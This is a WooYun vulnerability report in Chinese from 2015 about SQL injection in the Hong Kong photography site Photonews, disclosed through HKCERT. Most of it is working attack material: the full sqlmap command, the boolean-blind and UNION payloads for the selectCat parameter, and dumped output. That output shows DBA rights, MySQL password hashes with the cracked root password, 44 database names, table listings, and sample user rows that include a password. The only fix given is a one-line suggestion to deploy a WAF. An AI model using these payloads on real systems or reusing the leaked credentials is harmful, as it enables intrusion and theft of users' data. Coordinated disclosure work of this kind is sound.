当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155451

漏洞标题:Photonews 攝影日報某處存在SQL植入攻擊(DBA權限+root密碼泄露+44個庫+494萬用戶用戶名、密碼及登陸ip泄露)(香港地區)

相关厂商:Photonews 攝影日報

漏洞作者: 路人甲

提交时间:2015-11-24 11:38

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

攝影可以有很多風格,其實有些所謂風格,是基於地理位置和自然環境的不同而出現。

详细说明:

地址:http://**.**.**.**/news/newslist.php?selectCat=3

$ python sqlmap.py -u "http://**.**.**.**/news/newslist.php?selectCat=3" -p selectCat --technique=BU --random-agent --batch --no-cast -D photonews -T jk_loguser -C u,p,ip,date --dump --start 1 --stop 5


Database: photonews
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| jk_loguser                  | 4945522 |


展示其中的小部分数据:

Database: photonews
Table: jk_loguser
[4 entries]
+---------+------------+-------------+----------------+
| u       | date       | p           | ip             |
+---------+------------+-------------+----------------+
|         | 2005-12-15 | jk:         | **.**.**.**  |
|         | 2005-12-15 | jk:         | **.**.**.** |
|         | 2005-12-15 | jk:         | **.**.**.** |
| netalex | 2005-12-15 | jk:12344312 | **.**.**.**  |
+---------+------------+-------------+----------------+

漏洞证明:

---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
current user:    'jacky@localhost'
current user is DBA:    True
database management system users [8]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'jacky'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'shop'@'localhost'
database management system users password hashes:
[*] jacky [1]:
    password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF
    clear-text password: 1998
[*] root [2]:
    password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF
    clear-text password: 1998
    password hash: NULL
[*] shop [1]:
    password hash: *04B1AFC2D736152C4ACB6796B56E66E174F331D7
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
available databases [44]:
[*] #mysql50#health-popart
[*] betterhealth
[*] betterhealthemag
[*] faceapp_table
[*] facebookgiftsys
[*] forsale
[*] healthlink
[*] healthlinknew
[*] healthlinkQuery
[*] healthweb
[*] information_schema
[*] kidneyquestion
[*] limesurvey2
[*] mysql
[*] performance_schema
[*] photo
[*] photo2
[*] photonew2
[*] photonews
[*] photonews_new
[*] photonewweb
[*] photoold
[*] photoshop
[*] photoshop_hk
[*] popartdb
[*] poparttest
[*] shop
[*] shop2
[*] shopnewver
[*] shopvernew
[*] test
[*] testwordpress3
[*] ucenter
[*] ucenter2
[*] uchome
[*] uchome2
[*] wacoal
[*] wacoal_2012
[*] wacoal_2013
[*] wacoal_2014
[*] wacoal_2015
[*] webalbum
[*] wordpresstest
[*] wordpresstest2
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
current database:    'photonews'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
Database: photonews
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| jk_loguser                  | 4945522 |
| pcphoto_iDollar             | 366295  |
| pcphoto_forumarticle        | 193014  |
| pcphoto_camerafield         | 46694   |
| nuke_users                  | 34274   |
| pcphoto_memberlevel         | 25409   |
| blog_upload_data            | 18790   |
| pcphoto_photographvote      | 15634   |
| pcphoto_photographphoto     | 12027   |
| gamepoint                   | 11170   |
| blog_msg_data               | 6556    |
| pcphoto_privatemessage      | 6264    |
| blog_reply_data             | 6125    |
| pcphoto_photoshowphoto      | 5652    |
| pcphoto_libraryphoto        | 3632    |
| pcphoto_photoshowvote       | 3123    |
| pcphoto_userarticlevote     | 2662    |
| blog_config_data            | 2069    |
| blog_user_data              | 2069    |
| blog_hit_data               | 2068    |
| hkphoto                     | 1675    |
| pcphoto_newsarticle         | 1402    |
| blog_msgnum_data            | 1336    |
| pcphoto_libraryauth         | 1273    |
| sonycontest                 | 1217    |
| talklog                     | 1187    |
| sonycontest2                | 1150    |
| pcphoto_cameraphoto         | 1017    |
| pcphoto_newsarticle3        | 1000    |
| talk_epson                  | 944     |
| vitagreencontest            | 903     |
| pcphoto_photoshowmember     | 828     |
| pcphoto_cameravote          | 739     |
| pcphoto_photoshowalbum      | 702     |
| pcphoto_photoshowalbum2     | 694     |
| upload_data                 | 557     |
| pcphoto_camera              | 489     |
| blog_link_data              | 436     |
| webscan                     | 395     |
| upload_data_news            | 386     |
| book_data                   | 385     |
| buyer_history               | 336     |
| bwseminar                   | 328     |
| editor_data                 | 305     |
| digitdaily                  | 298     |
| olympus_resubmit            | 294     |
| centerphoto                 | 290     |
| shekcontest                 | 262     |
| olympus_event               | 233     |
| `20years`                   | 232     |
| jvc_event                   | 229     |
| maleonntalk                 | 229     |
| nikond700                   | 223     |
| shooting                    | 211     |
| pcphoto_download            | 204     |
| phototalk                   | 202     |
| blog_taker_data             | 174     |
| sony_event                  | 162     |
| pcphoto_userarticle         | 150     |
| olympus420                  | 141     |
| adobe_event                 | 137     |
| phototalk2                  | 137     |
| photoshopcs                 | 131     |
| newsonline_data             | 127     |
| pcphoto_camerafieldtable    | 125     |
| chkcontest                  | 120     |
| pcphoto_photographcatalog   | 115     |
| dc100                       | 84      |
| buyer_address               | 74      |
| forum_config                | 73      |
| book_contact                | 60      |
| chinaphoto                  | 59      |
| pcphoto_auctionbuyer        | 56      |
| d90                         | 54      |
| award_data                  | 53      |
| pcphoto_auction             | 52      |
| photoshopcs2                | 48      |
| pcphoto_forumtopic          | 47      |
| bookorder2                  | 45      |
| bookorder                   | 43      |
| d_letter                    | 43      |
| pcphoto_libraryalbum        | 40      |
| pcphoto_modelbm             | 39      |
| carddate                    | 35      |
| site_lock                   | 33      |
| pcphoto_auctioncatalog      | 32      |
| sonya900_2                  | 27      |
| pcphoto_cameracatalog       | 26      |
| list_show                   | 23      |
| pcphoto_newscatalog         | 22      |
| pcphoto_auctionvote         | 20      |
| magtalk                     | 18      |
| nuke_users3                 | 18      |
| sonya900                    | 16      |
| photo2005_photographphoto   | 14      |
| `23years`                   | 13      |
| changeforum                 | 13      |
| pcphoto_auctionwant         | 13      |
| blog_photo_data             | 12      |
| blog_photokind_data         | 12      |
| pma_gift                    | 11      |
| blog_skin_data              | 10      |
| newsonline_catalog          | 10      |
| book_contact_msg            | 9       |
| blog_photoac_data           | 8       |
| blog_photocfg_data          | 8       |
| digitdailycatalog           | 7       |
| pcphoto_forumauth           | 7       |
| book_magazine               | 5       |
| pcphoto_downloadcatalog     | 5       |
| tempmember                  | 5       |
| pcphoto_administrator       | 4       |
| pcphoto_auctioncategory     | 4       |
| pcphoto_librarycatalog      | 4       |
| pcphoto_modelbmcatalog      | 4       |
| pcphoto_newsauth            | 4       |
| pcphoto_newsletter          | 4       |
| pcphoto_pointslevel         | 4       |
| pcphoto_userarticlecatalog  | 4       |
| newsonline_news             | 3       |
| wish_user                   | 3       |
| testtable                   | 2       |
| blog_school_data            | 1       |
| blog_schoolnews_data        | 1       |
| memberdate                  | 1       |
| newsonline_member           | 1       |
| pcphoto_group               | 1       |
| photo2005_photographcatalog | 1       |
| ticket                      | 1       |
+-----------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
Database: photonews
Table: jk_loguser
[4 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| date   | date        |
| ip     | varchar(20) |
| p      | varchar(20) |
| u      | varchar(20) |
+--------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996
    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL 5
Database: photonews
Table: jk_loguser
[4 entries]
+---------+------------+-------------+----------------+
| u       | date       | p           | ip             |
+---------+------------+-------------+----------------+
|         | 2005-12-15 | jk:         | **.**.**.**  |
|         | 2005-12-15 | jk:         | **.**.**.** |
|         | 2005-12-15 | jk:         | **.**.**.** |
| netalex | 2005-12-15 | jk:12344312 | **.**.**.**  |
+---------+------------+-------------+----------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-27 15:12

厂商回复:

Referred to related parties.

最新状态:

暂无